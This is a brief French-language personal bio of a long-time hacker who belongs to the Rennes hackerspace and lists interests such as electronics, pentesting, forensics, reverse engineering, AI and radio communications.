Hacker de longue date, je suis membre actif du hacker-space de Rennes. Je touche à tout (électronique, hardware, serveurs, programmation, forensics, pentest, reverse engineering, IA, communications radio).
